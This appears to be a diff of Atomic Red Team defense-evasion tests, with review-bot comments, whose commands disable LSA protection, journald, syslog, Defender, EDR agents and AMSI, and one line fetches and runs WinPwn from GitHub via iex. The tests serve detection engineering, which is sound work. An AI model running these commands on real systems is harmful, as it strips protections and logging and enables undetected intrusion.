- [Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd](#atomic-test-33-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--cmd)
- [Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell](#atomic-test-34-lockbit-black---disable-privacy-settings-experience-using-registry--powershell)
- [Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell](#atomic-test-35-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--powershell)
- [Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature](#atomic-test-36-disable-windows-defender-with-pwsh-disable-windowsoptionalfeature)
- [Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder](#atomic-test-37-wmic-tamper-with-windows-defender-evade-scanning-folder)
- [Atomic Test #38: Delete Windows Defender Scheduled Tasks](#atomic-test-38-delete-windows-defender-scheduled-tasks)
- [Atomic Test #39: Clear History](#atomic-test-39-clear-history)
- [Atomic Test #40: Suspend History](#atomic-test-40-suspend-history)
- [Atomic Test #41: Reboot Linux Host via Kernel System Request](#atomic-test-41-reboot-linux-host-via-kernel-system-request)
- [Atomic Test #42: Clear Pagging Cache](#atomic-test-42-clear-pagging-cache)
- [Atomic Test #43: Disable Memory Swap](#atomic-test-43-disable-memory-swap)
- [Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI)](#atomic-test-44-disable-hypervisor-enforced-code-integrity-hvci)
- [Atomic Test #45: AMSI Bypass - Override AMSI via COM](#atomic-test-45-amsi-bypass---override-amsi-via-com)
- [Atomic Test #46: AWS - GuardDuty Suspension or Deletion](#atomic-test-46-aws---guardduty-suspension-or-deletion)
- [Atomic Test #47: Tamper with Defender ATP on Linux/MacOS](#atomic-test-47-tamper-with-defender-atp-on-linuxmacos)
- [Atomic Test #48: Tamper with Windows Defender Registry - Reg.exe](#atomic-test-48-tamper-with-windows-defender-registry---regexe)
- [Atomic Test #49: Tamper with Windows Defender Registry - Powershell](#atomic-test-49-tamper-with-windows-defender-registry---powershell)
- [Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI](#atomic-test-50-esxi---disable-account-lockout-policy-via-powercli)
- [Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune](#atomic-test-51-delete-microsoft-defender-asr-rules---intune)
- [Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO](#atomic-test-52-delete-microsoft-defender-asr-rules---gpo)
- [Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key](#atomic-test-53-amsi-bypass---create-amsienable-reg-key)
- [Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd](#atomic-test-54-disable-eventlog-application-auto-logger-session-via-registry---cmd)
- [Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell](#atomic-test-55-disable-eventlog-application-auto-logger-session-via-registry---powershell)
- [Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd](#atomic-test-56-disable-eventlog-application-etw-provider-via-registry---cmd)
- [Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell](#atomic-test-57-disable-eventlog-application-etw-provider-via-registry---powershell)
- [Atomic Test #58: Freeze PPL-protected process with EDR-Freeze](#atomic-test-58-freeze-ppl-protected-process-with-edr-freeze)
- [Atomic Test #59: Disable ASLR Via sysctl parameters - Linux](#atomic-test-59-disable-aslr-via-sysctl-parameters---linux)
- [Atomic Test #1: Windows Disable LSA Protection](#atomic-test-1-windows-disable-lsa-protection)
- [Atomic Test #2: Disable journal logging via systemctl utility](#atomic-test-2-disable-journal-logging-via-systemctl-utility)
- [Atomic Test #3: Disable journal logging via sed utility](#atomic-test-3-disable-journal-logging-via-sed-utility)
- [Atomic Test #4: Disable syslog](#atomic-test-1-disable-syslog)
- [Atomic Test #5: Disable syslog (freebsd)](#atomic-test-2-disable-syslog-freebsd)
- [Atomic Test #6: Disable Cb Response](#atomic-test-3-disable-cb-response)
- [Atomic Test #7: Disable SELinux](#atomic-test-4-disable-selinux)
- [Atomic Test #8: Stop Crowdstrike Falcon on Linux](#atomic-test-5-stop-crowdstrike-falcon-on-linux)
- [Atomic Test #9: Disable Carbon Black Response](#atomic-test-6-disable-carbon-black-response)
- [Atomic Test #10: Disable LittleSnitch](#atomic-test-7-disable-littlesnitch)
- [Atomic Test #11: Disable OpenDNS Umbrella](#atomic-test-8-disable-opendns-umbrella)
- [Atomic Test #12: Disable macOS Gatekeeper](#atomic-test-9-disable-macos-gatekeeper)
- [Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS](#atomic-test-10-stop-and-unload-crowdstrike-falcon-on-macos)
- [Atomic Test #14: Unload Sysmon Filter Driver](#atomic-test-11-unload-sysmon-filter-driver)
- [Atomic Test #15: Uninstall Sysmon](#atomic-test-12-uninstall-sysmon)
- [Atomic Test #16: AMSI Bypass - AMSI InitFailed](#atomic-test-13-amsi-bypass---amsi-initfailed)
- [Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-14-amsi-bypass---remove-amsi-provider-reg-key)
- [Atomic Test #18: Disable Arbitrary Security Windows Service](#atomic-test-15-disable-arbitrary-security-windows-service)
- [Atomic Test #19: Tamper with Windows Defender ATP PowerShell](#atomic-test-16-tamper-with-windows-defender-atp-powershell)
- [Atomic Test #20: Tamper with Windows Defender Command Prompt](#atomic-test-17-tamper-with-windows-defender-command-prompt)
- [Atomic Test #21: Tamper with Windows Defender Registry](#atomic-test-18-tamper-with-windows-defender-registry)
- [Atomic Test #22: Disable Microsoft Office Security Features](#atomic-test-19-disable-microsoft-office-security-features)
- [Atomic Test #23: Remove Windows Defender Definition Files](#atomic-test-20-remove-windows-defender-definition-files)
- [Atomic Test #24: Stop and Remove Arbitrary Security Windows Service](#atomic-test-21-stop-and-remove-arbitrary-security-windows-service)
- [Atomic Test #25: Uninstall Crowdstrike Falcon on Windows](#atomic-test-22-uninstall-crowdstrike-falcon-on-windows)
- [Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder](#atomic-test-23-tamper-with-windows-defender-evade-scanning--folder)
- [Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension](#atomic-test-24-tamper-with-windows-defender-evade-scanning--extension)
- [Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process](#atomic-test-25-tamper-with-windows-defender-evade-scanning--process)
- [Atomic Test #29: office-365-Disable-AntiPhishRule](#atomic-test-26-office-365-disable-antiphishrule)
- [Atomic Test #30: Disable Windows Defender with DISM](#atomic-test-27-disable-windows-defender-with-dism)
- [Atomic Test #31: Disable Defender Using NirSoft AdvancedRun](#atomic-test-28-disable-defender-using-nirsoft-advancedrun)
- [Atomic Test #32: Kill antimalware protected processes using Backstab](#atomic-test-29-kill-antimalware-protected-processes-using-backstab)
- [Atomic Test #33: WinPwn - Kill the event log services for stealth](#atomic-test-30-winpwn---kill-the-event-log-services-for-stealth)
- [Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell](#atomic-test-31-tamper-with-windows-defender-atp-using-aliases---powershell)
- [Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd](#atomic-test-32-lockbit-black---disable-privacy-settings-experience-using-registry--cmd)
- [Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon -cmd](#atomic-test-33-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--cmd)
- [Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell](#atomic-test-34-lockbit-black---disable-privacy-settings-experience-using-registry--powershell)
- [Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell](#atomic-test-35-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--powershell)
- [Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature](#atomic-test-36-disable-windows-defender-with-pwsh-disable-windowsoptionalfeature)
- [Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder](#atomic-test-37-wmic-tamper-with-windows-defender-evade-scanning-folder)
- [Atomic Test #41: Delete Windows Defender Scheduled Tasks](#atomic-test-38-delete-windows-defender-scheduled-tasks)
- [Atomic Test #42: Clear History](#atomic-test-39-clear-history)
- [Atomic Test #43: Suspend History](#atomic-test-40-suspend-history)
- [Atomic Test #44: Reboot Linux Host via Kernel System Request](#atomic-test-41-reboot-linux-host-via-kernel-system-request)
- [Atomic Test #45: Clear Pagging Cache](#atomic-test-42-clear-pagging-cache)
- [Atomic Test #46: Disable Memory Swap](#atomic-test-43-disable-memory-swap)
- [Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI)](#atomic-test-44-disable-hypervisor-enforced-code-integrity-hvci)
- [Atomic Test #48: AMSI Bypass - Override AMSI via COM](#atomic-test-45-amsi-bypass---override-amsi-via-com)
- [Atomic Test #49: AWS - GuardDuty Suspension or Deletion](#atomic-test-46-aws---guardduty-suspension-or-deletion)
- [Atomic Test #50: Tamper with Defender ATP on Linux/MacOS](#atomic-test-47-tamper-with-defender-atp-on-linuxmacos)
- [Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe](#atomic-test-48-tamper-with-windows-defender-registry---regexe)
- [Atomic Test #52: Tamper with Windows Defender Registry - Powershell](#atomic-test-49-tamper-with-windows-defender-registry---powershell)
- [Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI](#atomic-test-50-esxi---disable-account-lockout-policy-via-powercli)
- [Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune](#atomic-test-51-delete-microsoft-defender-asr-rules---intune)
- [Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO](#atomic-test-52-delete-microsoft-defender-asr-rules---gpo)
- [Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key](#atomic-test-53-amsi-bypass---create-amsienable-reg-key)
- [Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd](#atomic-test-54-disable-eventlog-application-auto-logger-session-via-registry---cmd)
- [Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell](#atomic-test-55-disable-eventlog-application-auto-logger-session-via-registry---powershell)
- [Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd](#atomic-test-56-disable-eventlog-application-etw-provider-via-registry---cmd)
- [Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell](#atomic-test-57-disable-eventlog-application-etw-provider-via-registry---powershell)
- [Atomic Test #61: Freeze PPL-protected process with EDR-Freeze](#atomic-test-58-freeze-ppl-protected-process-with-edr-freeze)
- [Atomic Test #62: Disable ASLR Via sysctl parameters - Linux](#atomic-test-59-disable-aslr-via-sysctl-parameters---linux)
- [Atomic Test #63: Auditing Configuration Changes on Linux Host](#atomic-test-1-auditing-configuration-changes-on-linux-host)
- [Atomic Test #64: Auditing Configuration Changes on FreeBSD Host](#atomic-test-2-auditing-configuration-changes-on-freebsd-host)
- [Atomic Test #65: Logging Configuration Changes on Linux Host](#atomic-test-3-logging-configuration-changes-on-linux-host)
- [Atomic Test #66: Logging Configuration Changes on FreeBSD Host](#atomic-test-4-logging-configuration-changes-on-freebsd-host)
- [Atomic Test #67: Disable Powershell ETW Provider - Windows](#atomic-test-5-disable-powershell-etw-provider---windows)
- [Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd)](#atomic-test-6-disable-net-event-tracing-for-windows-via-registry-cmd)
- [Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell)](#atomic-test-7-disable-net-event-tracing-for-windows-via-registry-powershell)
- [Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd](#atomic-test-8-lockbit-black---disable-the-etw-provider-of-windows-defender--cmd)
- [Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell](#atomic-test-9-lockbit-black---disable-the-etw-provider-of-windows-defender--powershell)
- [Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd](#atomic-test-10-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---cmd)
- [Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell](#atomic-test-11-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---powershell)
- [Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd](#atomic-test-12-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---cmd)
- [Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell](#atomic-test-13-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---powershell)
- [Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table](#atomic-test-14-block-cybersecurity-communication-by-leveraging-windows-name-resolution-policy-table)
### Atomic Test #1: Disable syslog
### Atomic Test #1: Windows Disable LSA Protection
The following Atomic adds a registry entry to disable LSA Protection.
The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
**Supported Platforms:** Windows
**auto_generated_guid:** `40075d5f-3a70-4c66-9125-f72bee87247d`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```cmd
reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
```
### Atomic Test #2: Disable journal logging via systemctl utility
The atomic test disables the journal logging using built-in systemctl utility
**Supported Platforms:** Linux
**auto_generated_guid:** `c3a377f9-1203-4454-aa35-9d391d34768f`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo systemctl stop systemd-journald #disables journal logging
```
#### Cleanup Commands
```sh
sudo systemctl start systemd-journald #starts journal service
sudo systemctl enable systemd-journald #starts journal service automatically at boot time
```
### Atomic Test #3: Disable journal logging via sed utility
The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
**Supported Platforms:** Linux
**auto_generated_guid:** `12e5551c-8d5c-408e-b3e4-63f53b03379f`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
```
#### Cleanup Commands
```sh
sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
sudo systemctl restart systemd-journald #restart the journal service
```
### Atomic Test #4: Disable syslog
Disables syslog collection
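Review bot: the attack step of the new Atomic Test #3, `sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf`, is a no-op on a stock system, because journald.conf ships that line commented out as `#Storage=auto`; the substitution produces `#Storage=none`, still a comment, and the attack never restarts journald (only the cleanup does), so even a successful edit would not take effect. Something like `sed -i 's/^#\?Storage=.*/Storage=none/' /etc/systemd/journald.conf` followed by `systemctl restart systemd-journald` would actually exercise the behaviour the description claims. Three smaller points in the same hunk: every TOC entry from `Atomic Test #4: Disable syslog` down to `#76` keeps its pre-renumber anchor (for example `#atomic-test-1-disable-syslog` under a title that now reads #4), so those links will all be dead once the headings below are renumbered; in Atomic Test #2, `systemctl stop systemd-journald` leaves `systemd-journald.socket` and `systemd-journald-dev-log.socket` listening, so the daemon is socket-reactivated by the next log write, and the cleanup's `systemctl enable systemd-journald` targets a static unit with no [Install] section and changes nothing; and in the LSA Protection test the cleanup `reg delete ... RunAsPPL /f` removes the value instead of restoring the previous one, so a host that had RunAsPPL set to 1 finishes the test with protection off, while the description's "disabling Lsass protection" should add that neither the attack nor the cleanup takes effect until the next reboot.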
@@ -127,7 +210,7 @@ if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
sudo #{package_installer}
```
### Atomic Test #2: Disable syslog (freebsd)
### Atomic Test #5: Disable syslog (freebsd)
Disables syslog collection
@@ -148,7 +231,7 @@ sysrc syslogd_enable="NO"
sysrc syslogd_enable="YES"
service syslogd start
```
### Atomic Test #3: Disable Cb Response
### Atomic Test #6: Disable Cb Response
Disable the Cb Response service
@@ -169,7 +252,7 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
fi
```
### Atomic Test #4: Disable SELinux
### Atomic Test #7: Disable SELinux
Disables SELinux enforcement
@@ -205,7 +288,7 @@ which setenforce
echo "SELinux is not installed"; exit 1
```
### Atomic Test #5: Stop Crowdstrike Falcon on Linux
### Atomic Test #8: Stop Crowdstrike Falcon on Linux
Stop and disable Crowdstrike Falcon on Linux
@@ -226,7 +309,7 @@ sudo systemctl disable falcon-sensor.service
sudo systemctl enable falcon-sensor.service
sudo systemctl start falcon-sensor.service
```
### Atomic Test #6: Disable Carbon Black Response
### Atomic Test #9: Disable Carbon Black Response
Disables Carbon Black Response
@@ -247,7 +330,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plis
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
```
### Atomic Test #7: Disable LittleSnitch
### Atomic Test #10: Disable LittleSnitch
Disables LittleSnitch
@@ -266,7 +349,7 @@ sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```sh
sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```
### Atomic Test #8: Disable OpenDNS Umbrella
### Atomic Test #11: Disable OpenDNS Umbrella
Disables OpenDNS Umbrella
@@ -285,7 +368,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig
```sh
sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
### Atomic Test #9: Disable macOS Gatekeeper
### Atomic Test #12: Disable macOS Gatekeeper
Disables macOS Gatekeeper
@@ -304,7 +387,7 @@ sudo spctl --master-disable
```sh
sudo spctl --master-enable
```
### Atomic Test #10: Stop and unload Crowdstrike Falcon on macOS
### Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS
Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
@@ -332,7 +415,7 @@ sudo launchctl unload #{userdaemon_plist}
sudo launchctl load -w #{falcond_plist}
sudo launchctl load -w #{userdaemon_plist}
```
### Atomic Test #11: Unload Sysmon Filter Driver
### Atomic Test #14: Unload Sysmon Filter Driver
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution,
run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
@@ -415,7 +498,7 @@ if(Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe"){
}
```
### Atomic Test #12: Uninstall Sysmon
### Atomic Test #15: Uninstall Sysmon
Uninstall Sysinternals Sysmon for Defense Evasion
@@ -427,7 +510,7 @@ Uninstall Sysinternals Sysmon for Defense Evasion
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | path | PathToAtomicsFolder&#92;T1562.001&#92;bin&#92;sysmon.exe|
| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | path | PathToAtomicsFolder&#92;T1685&#92;bin&#92;sysmon.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
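Review bot: the `sysmon_exe` default now points at `PathToAtomicsFolder\T1685\bin\sysmon.exe`, which only resolves if the `bin` directory was moved from `T1562.001` to `T1685` in this same commit; please confirm the move is among the 35 changed files, and that any prereq or get-prereq command that downloads Sysmon writes to the same renamed path, otherwise the default silently dangles and the test only works for users with sysmon.exe on PATH.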
@@ -475,7 +558,7 @@ if(cmd /c sc query sysmon) { exit 0} else { exit 1}
cmd /c sysmon -i -accepteula
```
### Atomic Test #13: AMSI Bypass - AMSI InitFailed
### Atomic Test #16: AMSI Bypass - AMSI InitFailed
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
Upon execution, no output is displayed.
@@ -497,7 +580,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
```
### Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key
### Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
@@ -518,7 +601,7 @@ Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-9
```powershell
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
```
### Atomic Test #15: Disable Arbitrary Security Windows Service
### Atomic Test #18: Disable Arbitrary Security Windows Service
With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.
@@ -547,7 +630,7 @@ sc.exe config #{service_name} start= disabled
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1
```
### Atomic Test #16: Tamper with Windows Defender ATP PowerShell
### Atomic Test #19: Tamper with Windows Defender ATP PowerShell
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
@@ -573,7 +656,7 @@ Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0
```
### Atomic Test #17: Tamper with Windows Defender Command Prompt
### Atomic Test #20: Tamper with Windows Defender Command Prompt
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
@@ -597,7 +680,7 @@ sc query WinDefend
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1
```
### Atomic Test #18: Tamper with Windows Defender Registry
### Atomic Test #21: Tamper with Windows Defender Registry
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
grayed out and have no info.
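Review bot: in the cleanup block, `sc config WinDefend start=enabled` is not a valid start type (sc.exe accepts boot, system, auto, demand, disabled and delayed-auto, and expects a space after `start=`), so the command fails and the `>nul 2>&1` hides the error; it should read `sc config WinDefend start= auto`. Since the description above notes these commands fail even as Administrator, it is worth stating explicitly that the cleanup is expected to fail the same way, so nobody reads it as having restored the service.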
@@ -617,7 +700,7 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
```
### Atomic Test #19: Disable Microsoft Office Security Features
### Atomic Test #22: Disable Microsoft Office Security Features
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
show any warning before editing the document.
@@ -647,7 +730,7 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Prot
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore
```
### Atomic Test #20: Remove Windows Defender Definition Files
### Atomic Test #23: Remove Windows Defender Definition Files
Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
@@ -665,7 +748,7 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```
### Atomic Test #21: Stop and Remove Arbitrary Security Windows Service
### Atomic Test #24: Stop and Remove Arbitrary Security Windows Service
Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
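Review bot: the first sentence of Atomic Test #24 attaches the "Beginning with Powershell 6.0" note to Stop-Service, but Stop-Service long predates 6.0; it is Remove-Service that first shipped in PowerShell 6.0, so the version qualifier belongs on the second cmdlet, and the test should say that it will not run under the built-in Windows PowerShell 5.1 without pwsh.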
@@ -686,7 +769,7 @@ Stop-Service -Name #{service_name}
Remove-Service -Name #{service_name}
```
### Atomic Test #22: Uninstall Crowdstrike Falcon on Windows
### Atomic Test #25: Uninstall Crowdstrike Falcon on Windows
Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
@@ -706,7 +789,7 @@ Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as a
if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
```
### Atomic Test #23: Tamper with Windows Defender Evade Scanning -Folder
### Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder
Malware can exclude a specific path from being scanned and evading detection.
Upon successul execution, the file provided should be on the list of excluded path.
@@ -735,7 +818,7 @@ Add-MpPreference -ExclusionPath $excludedpath
$excludedpath= "#{excluded_folder}"
Remove-MpPreference -ExclusionPath $excludedpath
```
### Atomic Test #24: Tamper with Windows Defender Evade Scanning -Extension
### Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension
Malware can exclude specific extensions from being scanned and evading detection.
Upon successful execution, the extension(s) should be on the list of excluded extensions.
@@ -764,7 +847,7 @@ Add-MpPreference -ExclusionExtension $excludedExts
$excludedExts= "#{excluded_exts}"
Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore
```
### Atomic Test #25: Tamper with Windows Defender Evade Scanning -Process
### Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process
Malware can exclude specific processes from being scanned and evading detection.
Upon successful execution, the process(es) should be on the list of excluded processes.
@@ -793,7 +876,7 @@ Add-MpPreference -ExclusionProcess $excludedProcess
$excludedProcess = "#{excluded_process}"
Remove-MpPreference -ExclusionProcess $excludedProcess
```
### Atomic Test #26: office-365-Disable-AntiPhishRule
### Atomic Test #29: office-365-Disable-AntiPhishRule
Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.
@@ -851,7 +934,7 @@ Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
```
### Atomic Test #27: Disable Windows Defender with DISM
### Atomic Test #30: Disable Windows Defender with DISM
The following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool.
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
@@ -868,7 +951,7 @@ This method will remove Defender and it's package.
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
```
### Atomic Test #28: Disable Defender Using NirSoft AdvancedRun
### Atomic Test #31: Disable Defender Using NirSoft AdvancedRun
Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html
This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
@@ -920,7 +1003,7 @@ Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "PathT
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force
```
### Atomic Test #29: Kill antimalware protected processes using Backstab
### Atomic Test #32: Kill antimalware protected processes using Backstab
Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill.
https://github.com/Yaxser/Backstab
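Review bot: the prereq fetch `Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip"` pulls a binary that the test then executes over plain HTTP with no integrity check, so anyone on the network path can substitute the archive; switch to https and compare the download's SHA-256 against a pinned value before the `Expand-Archive` step. The same hash check would suit the `Backstab64.exe` release download in the next hunk, which is version-pinned but otherwise unverified.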
@@ -959,7 +1042,7 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction
Invoke-WebRequest "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe"
```
### Atomic Test #30: WinPwn - Kill the event log services for stealth
### Atomic Test #33: WinPwn - Kill the event log services for stealth
Kill the event log services for stealth via function of WinPwn
@@ -974,7 +1057,7 @@ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/
inv-phantom -consoleoutput -noninteractive
```
